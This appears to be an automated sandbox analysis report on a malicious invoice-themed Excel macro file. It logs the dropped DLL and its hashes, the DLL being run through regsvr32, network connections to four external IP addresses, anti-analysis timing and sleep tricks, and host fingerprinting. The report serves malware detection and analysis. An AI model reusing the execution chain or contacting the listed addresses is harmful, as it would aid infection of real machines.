Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B8EF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C62F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BF6E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003A6AD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B96D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003CFA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C3EC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C1730
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C9B10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C3B00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B5B60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BBF50
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BE3F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B67C8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B83C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B7FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C7FC0
Source: INV8222874744_20210111490395.xlsmOLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: INV8222874744_20210111490395.xlsmOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\bjcbglsw.dll E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.bank.expl.evad.winXLSM@9/23@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INV8222874744_20210111490395.xlsmJump to behavior
Source: C:\Windows\System32\DWWIN.EXEMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2288
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDAB5.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: INV8222874744_20210111490395.xlsmReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456
Source: unknownProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2456
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2456
Source: C:\Windows\System32\DWWIN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: INV8222874744_20210111490395.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: INV8222874744_20210111490395.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: INV8222874744_20210111490395.xlsmInitial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000400A push esi; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010810 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D856 push ebp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000E8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001CD9B push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020A73 push edx; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEBF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023EFF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010307 push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001DB23 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020B27 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023FEB push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_100107FB pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0025BFB0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00227172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002462CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023F6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0022899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002289CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024FB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00221D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00220E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\bjcbglsw.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002388DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2488Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -501000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -798000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -780000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -644000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -795000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -426000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -730000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -718000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -131000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -652000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -284000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -648000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -488000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -241000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -552000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -620000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -332000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -755000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -296000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -531000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -678000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -556000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -668000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -996000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -640000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -510000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -720000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -625000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -770000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -157000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -459000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -358000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -496000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -534000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -283000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -536000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -423000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -301000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -684000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -411000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -1020000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -795000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -429000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -495000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -269000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -319000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -805000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -528000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -313000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -266000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -338000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -408000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -335000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -484000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -484000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -326000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -251000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -378000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -304000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -292000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -145000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -474000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -318000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -303000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -254000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -306000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -311000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -390000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -149000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -287000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -245000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -317000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -325000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -564000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -333000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -320000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -263000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -305000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -247000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -268000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -285000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572Thread sleep time: -344000s >= -30000s
Source: C:\Windows\System32\DWWIN.EXE TID: 2820Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003CCEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002388DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B6C50 LdrLoadDll,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0025B5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0025B6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B7A60 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 80.86.91.27 236
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 5.100.228.233 61
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 46.105.131.65 232
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 77.220.64.37 187
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2456
Source: regsvr32.exe, 00000003.00000002.2392737510.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392806725.00000000008C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2392737510.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392806725.00000000008C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2392737510.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392806725.00000000008C0000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B2980 GetUserNameW,
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
